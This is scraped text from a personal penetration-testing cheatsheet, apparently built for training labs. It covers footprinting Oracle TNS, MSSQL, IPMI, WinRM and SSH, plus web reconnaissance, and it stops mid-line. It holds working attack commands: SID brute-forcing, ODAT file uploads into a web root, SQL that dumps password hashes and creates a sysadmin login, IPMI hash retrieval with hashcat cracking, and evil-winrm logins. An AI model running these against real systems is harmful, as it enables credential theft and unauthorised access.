Machine](https://docs.rtlcopymemory.com/pentesting-machine) [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#nmap-sid-bruteforcing) **Nmap - SID Bruteforcing** ----------------------------------------------------------------------------------------------------------------- Copy sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#odat-more-information-user-bruteforcing-included) ODAT - More information, user bruteforcing included -------------------------------------------------------------------------------------------------------------------------------------------------------------------- [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#sqlplus-log-in) **SQLplus - Log In** --------------------------------------------------------------------------------------------------- In case of error `sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory` execute: `sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig` [SQLplus commands](https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985) : [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#database-enumeration) Database Enumeration --------------------------------------------------------------------------------------------------------- possible to try known credentials to use the System Databse Admin `sysdba`: Then list current user privs: From this point, we could retrieve the password hashes from the `sys.user$` and try to crack them offline: [](https://docs.rtlcopymemory.com/footprinting/oracle-tns#oracle-rdbms-file-upload) **Oracle RDBMS - File Upload** ----------------------------------------------------------------------------------------------------------------------- [PreviousMSSQL](https://docs.rtlcopymemory.com/footprinting/mssql) [NextIPMI](https://docs.rtlcopymemory.com/footprinting/ipmi) Last updated 1 year ago * [Tools](https://docs.rtlcopymemory.com/footprinting/oracle-tns#tools) * [Nmap - SID Bruteforcing](https://docs.rtlcopymemory.com/footprinting/oracle-tns#nmap-sid-bruteforcing) * [ODAT - More information, user bruteforcing included](https://docs.rtlcopymemory.com/footprinting/oracle-tns#odat-more-information-user-bruteforcing-included) * [SQLplus - Log In](https://docs.rtlcopymemory.com/footprinting/oracle-tns#sqlplus-log-in) * [Database Enumeration](https://docs.rtlcopymemory.com/footprinting/oracle-tns#database-enumeration) * [Oracle RDBMS - File Upload](https://docs.rtlcopymemory.com/footprinting/oracle-tns#oracle-rdbms-file-upload) Copy ./odat.py all -s 10.129.204.235 Copy sqlplus /@/ Copy select table_name from all_tables; Copy select * from user_role_privs; Copy sqlplus scott/[emailΒ protected]/XE as sysdba Copy select * from user_role_privs; Copy select name, password from sys.user$; Copy echo "Oracle File Upload Test" > testing.txt ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt Copy curl -X GET http://10.129.204.235/testing.txt --- # MSSQL | My Pentesting Cheatsheet Clients: * [SQL Server Management Studio](https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms?view=sql-server-ver15) * [mssql-cli](https://docs.microsoft.com/en-us/sql/tools/mssql-cli?view=sql-server-ver15) * [SQL Server PowerShell](https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-ver15) * [HeidiSQL](https://www.heidisql.com/) * [SQLPro](https://www.macsqlclient.com/) * [Impacket's mssqlclient.py](https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py) (Usually `mssqlclient.py`, or try `impacket-mssqlclient`) For Impacket's (often included in pentesting distros): Copy locate mssqlclient Impacket's default login is NOT the Windows login, use `-windows-auth` Default System Database Description `master` Tracks all system information for an SQL server instance `model` Template database that acts as a structure for every new database created. Any setting changed in the model database will be reflected in any new database created after changes to the model database `msdb` The SQL Server Agent uses this database to schedule jobs & alerts `tempdb` Stores temporary objects `resource` Read-only database containing system objects included with SQL server [](https://docs.rtlcopymemory.com/footprinting/mssql#nmap-command) nmap command ------------------------------------------------------------------------------------ [](https://docs.rtlcopymemory.com/footprinting/mssql#metasplot) Metasplot ------------------------------------------------------------------------------ module: `mssql_ping` [](https://docs.rtlcopymemory.com/footprinting/mssql#common-enumeration) Common enumeration ------------------------------------------------------------------------------------------------ from [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#manual-enumeration) [PreviousMySQL](https://docs.rtlcopymemory.com/footprinting/mysql) [NextOracle TNS](https://docs.rtlcopymemory.com/footprinting/oracle-tns) Last updated 1 year ago * [nmap command](https://docs.rtlcopymemory.com/footprinting/mssql#nmap-command) * [Metasplot](https://docs.rtlcopymemory.com/footprinting/mssql#metasplot) * [Common enumeration](https://docs.rtlcopymemory.com/footprinting/mssql#common-enumeration) Copy sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248 Copy set rhosts 10.129.201.248 run Copy # Get version select @@version; # Get user select user_name(); # Get databases SELECT name FROM master.dbo.sysdatabases; # Use database USE master #Get table names SELECT * FROM .INFORMATION_SCHEMA.TABLES; #List Linked Servers EXEC sp_linkedservers SELECT * FROM sys.servers; #List users select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name; #Create user with sysadmin privs CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!' EXEC sp_addsrvrolemember 'hacker', 'sysadmin' #Enumerate links enum_links #Use a link use_link [NAME] --- # SSH | My Pentesting Cheatsheet [ssh-audit](https://github.com/jtesta/ssh-audit) [PreviousIPMI](https://docs.rtlcopymemory.com/footprinting/ipmi) [NextRDP](https://docs.rtlcopymemory.com/footprinting/rdp) Last updated 1 year ago --- # Web Information Gathering | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/web-information-gathering#active-reconnaissance) Active Reconnaissance ------------------------------------------------------------------------------------------------------------- Technique Description Example Tools Risk of Detection `Port Scanning` Identifying open ports and services running on the target. Using Nmap to scan a web server for open ports like 80 (HTTP) and 443 (HTTPS). Nmap, Masscan, Unicornscan High: Direct interaction with the target can trigger intrusion detection systems (IDS) and firewalls. `Vulnerability Scanning` Probing the target for known vulnerabilities, such as outdated software or misconfigurations. Running Nessus against a web application to check for SQL injection flaws or cross-site scripting (XSS) vulnerabilities. Nessus, OpenVAS, Nikto High: Vulnerability scanners send exploit payloads that security solutions can detect. `Network Mapping` Mapping the target's network topology, including connected devices and their relationships. Using traceroute to determine the path packets take to reach the target server, revealing potential network hops and infrastructure. Traceroute, Nmap Medium to High: Excessive or unusual network traffic can raise suspicion. `Banner Grabbing` Retrieving information from banners displayed by services running on the target. Connecting to a web server on port 80 and examining the HTTP banner to identify the web server software and version. Netcat, curl Low: Banner grabbing typically involves minimal interaction but can still be logged. `OS Fingerprinting` Identifying the operating system running on the target. Using Nmap's OS detection capabilities (`-O`) to determine if the target is running Windows, Linux, or another OS. Nmap, Xprobe2 Low: OS fingerprinting is usually passive, but some advanced techniques can be detected. `Service Enumeration` Determining the specific versions of services running on open ports. Using Nmap's service version detection (`-sV`) to determine if a web server is running Apache 2.4.50 or Nginx 1.18.0. Nmap Low: Similar to banner grabbing, service enumeration can be logged but is less likely to trigger alerts. `Web Spidering` Crawling the target website to identify web pages, directories, and files. Running a web crawler like Burp Suite Spider or OWASP ZAP Spider to map out the structure of a website and discover hidden resources. Burp Suite Spider, OWASP ZAP Spider, Scrapy (customisable) Low to Medium: Can be detected if the crawler's behaviour is not carefully configured to mimic legitimate traffic. [](https://docs.rtlcopymemory.com/web-information-gathering#passive-reconnaissance) Passive Reconnaissance --------------------------------------------------------------------------------------------------------------- Technique Description Example Tools Risk of Detection `Search Engine Queries` Utilising search engines to uncover information about the target, including websites, social media profiles, and news articles. Searching Google for "`[Target Name] employees`" to find employee information or social media profiles. Google, DuckDuckGo, Bing, and specialised search engines (e.g., Shodan) Very Low: Search engine queries are normal internet activity and unlikely to trigger alerts. `WHOIS Lookups` Querying WHOIS databases to retrieve domain registration details. Performing a WHOIS lookup on a target domain to find the registrant's name, contact information, and name servers. whois command-line tool, online WHOIS lookup services Very Low: WHOIS queries are legitimate and do not raise suspicion. `DNS` Analysing DNS records to identify subdomains, mail servers, and other infrastructure. Using `dig` to enumerate subdomains of a target domain. dig, nslookup, host, dnsenum, fierce, dnsrecon Very Low: DNS queries are essential for internet browsing and are not typically flagged as suspicious. `Web Archive Analysis` Examining historical snapshots of the target's website to identify changes, vulnerabilities, or hidden information. Using the Wayback Machine to view past versions of a target website to see how it has changed over time. Wayback Machine Very Low: Accessing archived versions of websites is a normal activity. `Social Media Analysis` Gathering information from social media platforms like LinkedIn, Twitter, or Facebook. Searching LinkedIn for employees of a target organisation to learn about their roles, responsibilities, and potential social engineering targets. LinkedIn, Twitter, Facebook, specialised OSINT tools Very Low: Accessing public social media profiles is not considered intrusive. `Code Repositories` Analysing publicly accessible code repositories like GitHub for exposed credentials or vulnerabilities. Searching GitHub for code snippets or repositories related to the target that might contain sensitive information or code vulnerabilities. GitHub, GitLab Very Low: Code repositories are meant for public access, and searching them is not suspicious. [PreviousWinRM](https://docs.rtlcopymemory.com/footprinting/winrm) [NextWhois](https://docs.rtlcopymemory.com/web-information-gathering/whois) Last updated 1 year ago --- # IPMI | My Pentesting Cheatsheet [Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI_Basics) (`IPMI`) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. IPMI is typically used in three ways: * Before the OS has booted to modify BIOS settings * When the host is fully powered down * Access to a host after a system failure [](https://docs.rtlcopymemory.com/footprinting/ipmi#tools) Tools --------------------------------------------------------------------- Copy sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local ### [](https://docs.rtlcopymemory.com/footprinting/ipmi#metasploit-version-scan) Metasploit version scan Copy use auxiliary/scanner/ipmi/ipmi_version ### [](https://docs.rtlcopymemory.com/footprinting/ipmi#flaw) Flaw [flaw](http://fish2.com/ipmi/remote-pw-cracking.html) in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place. `Hashcat` mode `7300` `hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u` To retrieve IPMI hashes, we can use the Metasploit [IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval](https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes/) module Copy use auxiliary/scanner/ipmi/ipmi_dumphashes set rhosts run [PreviousOracle TNS](https://docs.rtlcopymemory.com/footprinting/oracle-tns) [NextSSH](https://docs.rtlcopymemory.com/footprinting/ssh) Last updated 1 year ago --- # WinRM | My Pentesting Cheatsheet Copy nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n If we want to find out whether one or more remote servers can be reached via WinRM, we can easily do this with the help of PowerShell. The [Test-WsMan](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/test-wsman?view=powershell-7.2) cmdlet is responsible for this, and the host's name in question is passed to it. In Linux-based environments, we can use the tool called [evil-winrm](https://github.com/Hackplayers/evil-winrm) , another penetration testing tool designed to interact with WinRM. Copy evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD! [PreviousRDP](https://docs.rtlcopymemory.com/footprinting/rdp) [NextWeb Information Gathering](https://docs.rtlcopymemory.com/web-information-gathering) Last updated 1 year ago --- # Enumeration | My Pentesting Cheatsheet [](https://docs.rtlcopymemory.com/enumeration#wordlists) Wordlists ----------------------------------------------------------------------- * [Seclists](https://github.com/danielmiessler/SecLists) * Subdomain enumeration: /Discovery/DNS (subdomain\*) * Pages, Extensions, Directory, Parameters: /Discovery/Web-Content (directory-list\*.txt, web-extensions.txt, burp-parameter-names.txt) * LFI wordlist: /Fuzzing/LFI * [Crunch](https://secf00tprint.github.io/blog/passwords/crunch/advanced/en) Word list generator [](https://docs.rtlcopymemory.com/enumeration#port-mapping) Port mapping ----------------------------------------------------------------------------- ### [](https://docs.rtlcopymemory.com/enumeration#nmap) Nmap Flag Description `-sC` Run scripts `-sV` Version scan `-p ` Specify ports. Can be a list, can contain ranges `-p-` Scan all 65535 ports `--script=